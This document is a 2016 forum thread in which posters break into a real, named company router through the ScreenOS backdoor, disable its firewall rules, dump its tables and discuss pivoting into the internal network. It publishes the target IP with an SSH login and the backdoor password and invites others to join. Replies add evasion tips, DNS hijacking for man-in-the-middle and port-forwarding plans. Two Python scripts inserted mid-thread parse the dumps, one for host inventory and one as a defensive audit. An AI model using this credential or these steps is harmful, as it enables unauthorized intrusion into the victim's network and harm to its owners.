OK guise, let's commandeer this network for keks.
-
2016-01-26 at 12:15 PM UTC
You may recall my thread on ScreenOS router backdoors: http://niggasin.space/forum/technoph...list-by-sophie If you haven't read it already, you should; it's an interesting thread. Anyway, I SSH'd into a backdoored router to see if I could do anything interesting. I'm root, so I can basically do anything I want. First I dropped all screens (firewall rules), then I was able to portscan the IP in question. Here are the results.
Starting Nmap 6.47
Nmap scan report for rrcs-24-213-214-22.nys.biz.rr.com (24.213.214.22)
Host is up (0.023s latency).
Not shown: 808 filtered ports, 189 closed ports
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
8181/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds
The http-proxy service redirects from 24.213.214.22:8080 to 24.213.214.22:8181, which is a login screen (https://24.213.214.22:8181/index.html), probably for remote access to the router via HTTPS. Querying the administrative configuration seems to corroborate this.
HTTP Port: 8080, HTTPS Port: 8181
TELNET Port: 23, SSH Port: 22
Manager IP enforced: False
Manager IPs: 0
Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
Mail Alert: Off, Mail Server:
E-Mail Address:
E-Mail Traffic Log: Off
Configuration Format: DOS
Device Reset: Enabled
Hardware Reset: Enabled
Admin privilege: read-only (Remote admin has read-only privileges)
Max Failed Admin login attempts: 3
Lock admin accounts on auth failure: On, locking time 3 minutes
HTTP redirect: true
Also note how admin privilege says we should have "read only" privilege; well, that would be true if we logged in with a regular admin account, but the nature of the backdoor is that you log in as sys/root. There are also a number of devices connected to the router, as the ARP table shows:
usage: 6/1024 miss: 0
always-on-dest: disabled
-----------------------------------------------------------------------------------------
IP Mac VR/Interface State Age Retry PakQue Sess_cnt
-----------------------------------------------------------------------------------------
192.168.55.255 ffffffffffff trust-vr/bgroup0 STS 0 0 1
192.168.55.200 0000aafb5ea6 trust-vr/bgroup0 VLD 693 0 0 0
24.213.214.21 0000ca000003 trust-vr/eth0/0 VLD 666 0 0 9
192.168.55.105 7427eaf334d5 trust-vr/bgroup0 VLD 1180 0 0 2
192.168.55.114 08000f678d32 trust-vr/bgroup0 VLD 494 0 0 2
192.168.55.115 08000f678f4e trust-vr/bgroup0 VLD 313 0 0 2
Now I was wondering, since we own the router and firewall, what would be the next logical step in securing the rest of the network? Feel free to SSH into the thing and come have a look.
ssh -l administrator 24.213.214.22
Password: <<< %s(un='%s') = %u
Here's a list of basic commands.
http://www.skullbox.net/screenos-cheat-sheet.php
Here are some more obscure commands, including those for displaying all commands available.
http://www.cymru.com/gillsr/document...n-commands.htm
-
2016-01-26 at 1:58 PM UTC
inb4 honeypot
Nice job, SWIY.
A word of caution though:
SSH may also log your public key fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.
As far as what to do next:
You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the ARP table, routing table, DHCP entries. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the ARP table with the DHCP table and then find out the manufacturer of connected devices from their MAC addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kind of traffic is going in and out. This is all completely passive: you're not interacting with the network in any way, so you shouldn't set off any IDS or anything.
As far as active recon, I don't have any ideas right now.
-
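The passive inventory the post above describes (walk the ARP table, tie each entry to its interface and zone, and read the vendor off the MAC prefix), as an added example in Python that is not part of this thread and not ScreenOS code. The sample input is the `get arp` dump posted at the top of the thread; the interface-to-zone map is taken from the `get interface` dump that appears later in the thread; the OUI table is a four-entry excerpt typed from memory and is an assumption (verify against the IEEE registry file before relying on it).

```python
"""Triage a ScreenOS `get arp` dump: which hosts sit behind the firewall,
which interface/zone they hang off, and what their MAC OUIs suggest.

Added example for this thread; not ScreenOS code. ARP_DUMP is the `get arp`
output pasted in the thread, IFACE_ZONE comes from its `get interface` dump,
and OUI is an illustrative excerpt (assumption: load the IEEE oui.txt instead).
"""
from __future__ import annotations

import re
from dataclasses import dataclass

ARP_DUMP = """\
usage: 6/1024 miss: 0
always-on-dest: disabled
-----------------------------------------------------------------------------------------
IP Mac VR/Interface State Age Retry PakQue Sess_cnt
-----------------------------------------------------------------------------------------
192.168.55.255 ffffffffffff trust-vr/bgroup0 STS 0 0 1
192.168.55.200 0000aafb5ea6 trust-vr/bgroup0 VLD 693 0 0 0
24.213.214.21 0000ca000003 trust-vr/eth0/0 VLD 666 0 0 9
192.168.55.105 7427eaf334d5 trust-vr/bgroup0 VLD 1180 0 0 2
192.168.55.114 08000f678d32 trust-vr/bgroup0 VLD 494 0 0 2
192.168.55.115 08000f678f4e trust-vr/bgroup0 VLD 313 0 0 2
"""

# Interface -> security zone, read off the thread's `get interface` output.
IFACE_ZONE = {"eth0/0": "Untrust", "bgroup0": "Trust"}

# OUI prefix (first 3 bytes) -> vendor. Typed from memory as an illustration;
# assumption, not verified here: replace with the IEEE registry for real work.
OUI = {"0000aa": "Xerox", "08000f": "Mitel", "7427ea": "Elitegroup (ECS)", "0000ca": "ARRIS"}


@dataclass
class ArpEntry:
    ip: str
    mac: str
    vr: str
    iface: str
    state: str


# One data row: IP, 12-hex-digit MAC, "<vr>/<interface>" (interface may itself
# contain a slash, e.g. eth0/0, so the vr group is non-greedy), then the state.
ARP_LINE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<mac>[0-9a-fA-F]{12})\s+"
    r"(?P<vr>\S+?)/(?P<iface>\S+)\s+(?P<state>\w+)"
)


def parse_arp(dump: str) -> list[ArpEntry]:
    """Skip the header/separator lines and return every ARP row."""
    entries = []
    for line in dump.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            entries.append(ArpEntry(m["ip"], m["mac"].lower(), m["vr"], m["iface"], m["state"]))
    return entries


def is_broadcast(mac: str) -> bool:
    return mac == "ffffffffffff"


def vendor(mac: str, oui_table: dict[str, str] = OUI) -> str:
    return oui_table.get(mac[:6].lower(), "unknown")


def inventory(dump: str, zones: dict[str, str] = IFACE_ZONE,
              oui_table: dict[str, str] = OUI) -> list[dict]:
    """Real hosts only (the broadcast pseudo-entry is dropped), each labelled
    with its zone, vendor guess, and whether it is the upstream gateway."""
    rows = []
    for e in parse_arp(dump):
        if is_broadcast(e.mac):
            continue
        zone = zones.get(e.iface, "?")
        rows.append({
            "ip": e.ip, "mac": e.mac, "iface": e.iface, "zone": zone,
            "vendor": vendor(e.mac, oui_table),
            "role": "upstream gateway" if zone == "Untrust" else "internal host",
        })
    return rows


if __name__ == "__main__":
    for r in inventory(ARP_DUMP):
        print(f"{r['ip']:<16} {r['mac']} {r['zone']:<8} {r['vendor']:<18} {r['role']}")
```

The only entry on the Untrust side is the ISP next hop; everything else hangs off bgroup0 in the Trust zone, which is the host list a scan would be aimed at.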
2016-01-27 at 3:01 PM UTC
"Now I was wondering, since we own the router and firewall, what would be the next logical step in securing the rest of the network?"
Get us some more info on the clients; see what's diddling around, what services, OSes they like, etc.
gj
https://www.youtube.com/watch?v=cIzM9p3dUm8
-
2016-01-27 at 6:56 PM UTC
inb4 honeypot
Nice job, SWIY.
A word of caution though:
SSH may also log your public key fingerprints even if you're using a password (I think it first tries pubkey auth, then password auth), so it might be wise to make sure you're not offering your pubkey fingerprint.
As far as what to do next:
You have access to the router. That's pretty fucking awesome. It's easier to explore the network if you're sitting on the router. You've got the ARP table, routing table, DHCP entries. I've only worked with Cisco hardware, but I assume Juniper stuff has to include the same functionality, so you should be able to check out these files. One thing that comes to mind is to link entries from the ARP table with the DHCP table and then find out the manufacturer of connected devices from their MAC addresses. If you can access the NAT table, you can also deduce what services are connecting outside of the router (if NAT is even used) and get an idea of what kind of traffic is going in and out. This is all completely passive: you're not interacting with the network in any way, so you shouldn't set off any IDS or anything.
As far as active recon, I don't have any ideas right now.
"get nat"
Didn't give me anything. "get dhcp" told me the DHCP server is enabled but:
bgroup0: DHCP server is enabled
Total 0 MACs are queued by DHCP relay.
Truth be told, I'm not much of a network engineer; furthermore, ScreenOS has other 'command' conventions than what I'm used to. Also:
Get us some more info on the clients; see what's diddling around, what services, OSes they like, etc.
I would, but first I'll be looking into some ScreenOS commands some more to actually get the thing to do what I want it to do. Any tips would be welcomed.
-
2016-01-28 at 2:12 PM UTC
Hm, I'll try to look into it soon. There's gotta be some way to read the tables :/ I mean, Cisco IOS has all these tools to manually edit this info, so I can't believe Juniper OS doesn't have the same capabilities... but maybe it is. I've got like 1h of internet time a day; I'll try to get back to you.
Did you make any progress?
-
2016-01-28 at 4:55 PM UTC
Did you make any progress?
I had some IRL matter to take care of today; tonight, when I have a moment, I'll play around with it some more.
-
2016-01-28 at 10:32 PM UTC
Is there any valuable data within this network, or is it just a network to play with?
-
2016-01-28 at 11:12 PM UTC
"get tcp" showed me this:
tcp checksum error: 11, tcp http ping: 0
tcp user auth: 0, tcp unknown port 0
tcp no more socket: 0, tcp syn pak error: 7522
tcp socket full drop count: 331
tcp ooo segs: 0, tcp ooo segs drop count: 0
max ooo segs: 32, default max ooo segs 32
Total sock: 5/64, debug remote port: 65535
1: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8181, ::/0, window: 0/0/0
2: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/23, ::/0, window: 0/0/0
3: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/22, ::/0, window: 0/0/0
47: inuse: 1, mode: 2, state: 4, ifnum: 0, idle: 0, timer 1(0/10)
24.213.214.22/22, 95.141.29.38/2593, window: -172350114/-1651650253/16384
50: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8080, ::/0, window: 0/0/0
"get interface" showed me this.
A - Active, I - Inactive, U - Up, D - Down, R - Ready
Interfaces in vsys Root:
Name IP Address Zone MAC VLAN State VSD
serial0/0 0.0.0.0/0 Null N/A - D -
eth0/0 24.213.214.22/30 Untrust 3c8a.b0af.2d80 - U -
eth0/1 0.0.0.0/0 Null 3c8a.b0af.2d85 - D -
eth0/3 0.0.0.0/0 Null 3c8a.b0af.2d87 - D -
eth0/4 0.0.0.0/0 Null 3c8a.b0af.2d88 - D -
eth0/5 0.0.0.0/0 Null 3c8a.b0af.2d89 - D -
eth0/6 0.0.0.0/0 Null 3c8a.b0af.2d8a - D -
bgroup0 192.168.55.1/24 Trust 3c8a.b0af.2d8b - U -
eth0/2 N/A N/A N/A - U -
bgroup1 0.0.0.0/0 Null 3c8a.b0af.2d8c - D -
bgroup2 0.0.0.0/0 Null 3c8a.b0af.2d8d - D -
bgroup3 0.0.0.0/0 Null 3c8a.b0af.2d8e - D -
tun.1 unnumbered Trust ethernet0/0 - U -
vlan1 0.0.0.0/0 VLAN 3c8a.b0af.2d8f 1 D -
null 0.0.0.0/0 Null N/A - U -
Dropped some system info. But guys, Jesus Christ, the documentation on ScreenOS including all commands is literally 900 pages long.
PIN-ROCH-> get system
Product Name: SSG5-Serial
Serial Number: 0162112013000693, Control Number: 00000000
Hardware Version: 0710(0)-(00), FPGA checksum: 00000000, VLAN1 IP (0.0.0.0)
Flash Type: Samsung
Software Version: 6.3.0r17.0, Type: Firewall+VPN
Feature: AV-K
BOOT Loader Version: 1.3.2
Compiled by build_master at: Sun Apr 20 10:10:02 PDT 2014
Base Mac: 3c8a.b0af.2d80
File Name: screenos_image, Checksum: ca92f672
, Total Memory: 256MB
Date 01/28/2016 17:59:44, Daylight Saving Time enabled
The Network Time Protocol is Disabled
Up 1693 hours 48 minutes 40 seconds Since 19Nov2015:04:11:04
Total Device Resets: 0
System in NAT/route mode.
Use interface IP, Config Port: 8080
Manager IP enforced: False
Manager IPs: 0
Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
User Name: netscreen
Interface serial0/0:
description serial0/0
number 21, if_info 1848, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d95
bandwidth: physical 92kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/0:
description ethernet0/0
number 0, if_info 0, if_index 0, mode route
link up, phy-link up/full-duplex, admin status up
status change:105, last change:01/27/2016 17:12:00
vsys Root, zone Untrust, vr trust-vr
dhcp client disabled
PPPoE disabled
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 24.213.214.22/30 mac 3c8a.b0af.2d80
gateway 24.213.214.21
*manage ip 24.213.214.22, mac 3c8a.b0af.2d80
route-deny disable
bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/1:
description ethernet0/1
number 5, if_info 440, if_index 0
link down, phy-link down, admin status down
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d85
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/2:
description ethernet0/2
number 6, if_info 528, if_index 0
link up, phy-link up/full-duplex
status change:1, last change:11/19/2015 04:11:06
member of bgroup0
vsys Root, zone Null, vr untrust-vr
*ip 0.0.0.0/0 mac 3c8a.b0af.2d86
Interface ethernet0/3:
description ethernet0/3
number 7, if_info 616, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d87
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/4:
description ethernet0/4
number 8, if_info 704, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d88
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/5:
description ethernet0/5
number 9, if_info 792, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d89
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/6:
description ethernet0/6
number 10, if_info 880, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8a
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup0:
description bgroup0
number 11, if_info 968, if_index 0, mode nat
link up, phy-link up/full-duplex, admin status up
status change:1, last change:11/19/2015 04:11:06
vsys Root, zone Trust, vr trust-vr
dhcp client disabled
PPPoE disabled
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 192.168.55.1/24 mac 3c8a.b0af.2d8b
*manage ip 192.168.55.1, mac 3c8a.b0af.2d8b
route-deny disable
bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup1:
description bgroup1
number 12, if_info 1056, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8c
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup2:
description bgroup2
number 13, if_info 1144, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8d
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup3:
description bgroup3
number 14, if_info 1232, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 3c8a.b0af.2d8e
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
-
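A defender's read of the dumps posted so far, as an added example in Python that is not part of this thread and not ScreenOS or Juniper code. It parses trimmed copies of the `get system` and `get tcp` output above and the `get admin` output from the first post, flags the 6.3.0r17 build as one of the releases (6.3.0r17 through 6.3.0r20, per Juniper advisory JSA10713) that accept the CVE-2015-7755 hard-coded password shown in the first post, notes that no manager IP is enforced and NTP is off, and lists which management ports are listening and which remote address currently holds a session. Treating a socket whose peer is `::/0` as a listener is an inference from this dump, not documented ScreenOS semantics.

```python
"""Audit ScreenOS status dumps (`get system`, `get admin`, `get tcp`) for the
findings a defender would act on: backdoor-affected firmware, unrestricted
management access, no NTP, cleartext telnet, and who is logged in right now.

Added example for this thread; not ScreenOS code. The three sample dumps are
trimmed copies of output pasted in the thread (constructed inline here).
Affected-version range for CVE-2015-7755: 6.3.0r17..6.3.0r20 (Juniper JSA10713).
"""
from __future__ import annotations

import re

GET_SYSTEM = """\
Product Name: SSG5-Serial
Software Version: 6.3.0r17.0, Type: Firewall+VPN
The Network Time Protocol is Disabled
Manager IP enforced: False
Manager IPs: 0
"""

GET_ADMIN = """\
HTTP Port: 8080, HTTPS Port: 8181
TELNET Port: 23, SSH Port: 22
Manager IP enforced: False
Manager IPs: 0
Admin privilege: read-only (Remote admin has read-only privileges)
"""

GET_TCP = """\
Total sock: 5/64, debug remote port: 65535
1: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8181, ::/0, window: 0/0/0
2: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/23, ::/0, window: 0/0/0
3: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/22, ::/0, window: 0/0/0
47: inuse: 1, mode: 2, state: 4, ifnum: 0, idle: 0, timer 1(0/10)
24.213.214.22/22, 95.141.29.38/2593, window: -172350114/-1651650253/16384
50: inuse: 1, mode: 0, state: 0, ifnum: -1, idle: 0, timer 0
::/8080, ::/0, window: 0/0/0
"""

VERSION_RE = re.compile(r"Software Version:\s*(\d+)\.(\d+)\.(\d+)r(\d+)")
# Address lines in `get tcp` look like "<local>/<port>, <peer>/<port>, window: ..."
SOCK_RE = re.compile(r"^(\S+)/(\d+),\s+(\S+)/(\d+),")


def parse_version(get_system: str) -> tuple[int, int, int, int] | None:
    """(major, minor, patch, release) from `get system`, e.g. (6, 3, 0, 17)."""
    m = VERSION_RE.search(get_system)
    return tuple(int(x) for x in m.groups()) if m else None


def backdoor_affected(version) -> bool:
    """CVE-2015-7755 (hard-coded admin password) ships in 6.3.0r17 through r20."""
    return version is not None and version[:3] == (6, 3, 0) and 17 <= version[3] <= 20


def manager_ip_enforced(dump: str) -> bool:
    m = re.search(r"Manager IP enforced:\s*(True|False)", dump)
    return bool(m and m.group(1) == "True")


def parse_sockets(get_tcp: str) -> list[dict]:
    """Local/peer pairs from `get tcp`. A peer of ::/0 is taken to be a listener
    (assumption drawn from this dump: all four management ports show ::/0)."""
    socks = []
    for line in get_tcp.splitlines():
        m = SOCK_RE.match(line.strip())
        if not m:
            continue
        local_ip, local_port, peer_ip, peer_port = m.groups()
        socks.append({
            "local": (local_ip, int(local_port)),
            "peer": (peer_ip, int(peer_port)),
            "listening": peer_ip == "::" and peer_port == "0",
        })
    return socks


def audit(get_system: str, get_admin: str, get_tcp: str) -> list[str]:
    """Findings as short strings; an empty list means nothing was flagged."""
    findings = []
    ver = parse_version(get_system)
    if backdoor_affected(ver):
        findings.append(f"ScreenOS {ver[0]}.{ver[1]}.{ver[2]}r{ver[3]}: CVE-2015-7755 "
                        "backdoor password accepted; upgrade past 6.3.0r20")
    if not manager_ip_enforced(get_admin):
        findings.append("Manager IP not enforced: management reachable from any source address")
    if "Network Time Protocol is Disabled" in get_system:
        findings.append("NTP disabled: log timestamps not trustworthy for an incident timeline")
    socks = parse_sockets(get_tcp)
    if any(s["listening"] and s["local"][1] == 23 for s in socks):
        findings.append("Telnet (23) listening: cleartext management; the backdoor string is visible on the wire")
    for s in socks:
        if not s["listening"]:
            findings.append(f"Active session: {s['peer'][0]}:{s['peer'][1]} -> port {s['local'][1]}; "
                            "confirm it belongs to an authorised admin")
    return findings


if __name__ == "__main__":
    for f in audit(GET_SYSTEM, GET_ADMIN, GET_TCP):
        print("-", f)
```

The established-session line is the one an incident responder cares about most: on a box running a backdoored build, a management session from an address that is not in the admin's own list is evidence, not noise.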
2016-01-28 at 11:30 PM UTC
Maybe I'll just let Nexpose scan the router with the credentials I provided; maybe that would make me any the wiser.
-
2016-01-28 at 11:37 PM UTC
Is there any valuable data within this network, or is it just a network to play with?
No clue; so far all I've been able to access is the router.
-
2016-02-02 at 12:19 PM UTC
Give me like 2 hours and I'll have every box on the network rooted
-
2016-02-02 at 3:47 PM UTC
Give me like 2 hours and I'll have every box on the network rooted
Teach me the ways of the force, master.
-
2016-02-02 at 4:55 PM UTC
Teach me the ways of the force, master.
Sorry that I haven't posted anything yet, I just got back from traveling and I'm jet lagged back into 1999.
-
2016-02-02 at 9:49 PM UTC
Sorry that I havent posted anything yet, I just got back from traveling and Im jet lagged back into 1999.
No need to apologize, silly.
-
2016-02-05 at 10:39 AM UTC
Interesting make-believe scenario.
So there's not much going on in there, it seems. No DHCP; maybe the hosts use static addressing? The ARP'd MACs show that there are probably a few PCs and a printer on the network. You could try scanning those IPs for open ports.
Another thing that comes to mind is taking a snapshot of the current interface counters now and in like 24h to get an idea of how much data is moved through the network. Looking at the docs, you'd do this by:
get counter statistics interface ethernet0/0
get counter statistics interface ethernet0/6
I'm going by your latest info dump, which specifies interfaces 0 and 6 as being up and all the others as being down.
You could also do
get dns host settings - Displays DNS servers and assigned interfaces
get admin - Displays management information such as access ports and filtered IP addresses
A DNS server/cache could be a trove of information or helpful in further steps in this game.
-
2016-02-05 at 1:19 PM UTC
Currently running a network audit with Nexpose with the credentials I provided; if nothing interesting comes up I'll run an asset discovery scan, and if that turns up the local network I'll run a general audit on the devices on the network itself. Obviously I'll post the results here. Here's the info you requested.
get dns host settings
DNS Server:
Primary : 24.92.226.11, Src Interface: ethernet0/0
Secondary: 24.92.226.12, Src Interface: ethernet0/0
Tertiary : 0.0.0.0, Src Interface: Null
Refresh domain name IP Addresses:
Never
Normal UDP session: 0
-
2016-02-05 at 2:13 PM UTC
Currently running a network audit with Nexpose with the credentials I provided; if nothing interesting comes up I'll run an asset discovery scan, and if that turns up the local network I'll run a general audit on the devices on the network itself. Obviously I'll post the results here. Here's the info you requested.
get dns host settings
DNS Server:
Primary : 24.92.226.11, Src Interface: ethernet0/0
Secondary: 24.92.226.12, Src Interface: ethernet0/0
Tertiary : 0.0.0.0, Src Interface: Null
Refresh domain name IP Addresses:
Never
Normal UDP session: 0
GJ dude. The DNS stuff doesn't look interesting; it's just using some default TWC DNS servers, I think. It does offer some chance of a MITM if you set up your own DNS server and changed those settings to point to your DNS server.
-
2016-02-05 at 3:46 PM UTC
GJ dude. The dns stuff doesn't look interesting, it's just using some default TWC dns servers I think. It does offer some chance of a mitm if you set up your own dns server and changed those settings to point to your dns server.
I'm trying to forward some ports. "set VIP multi-port" is the first command in a series you need to perform, but it told me the router had to be reset in order for the changes to take effect. I thought about it, but if there are people actively using the network and I reset the router remotely they might start to ask questions, lel. Also, sadly, I don't have my own DNS server. Nexpose only got as far as the router; it did find some vulnerabilities related to the web interface of the thing, but nothing too interesting, mostly certificate stuff.
Now I usually do web app, so I have no idea how to get past the router into the network itself without forwarding ports, or if that's even the best way for that matter. Here's the documentation I could find on port forwarding: http://kb.juniper.net/InfoCenter/ind...tent&id=KB4740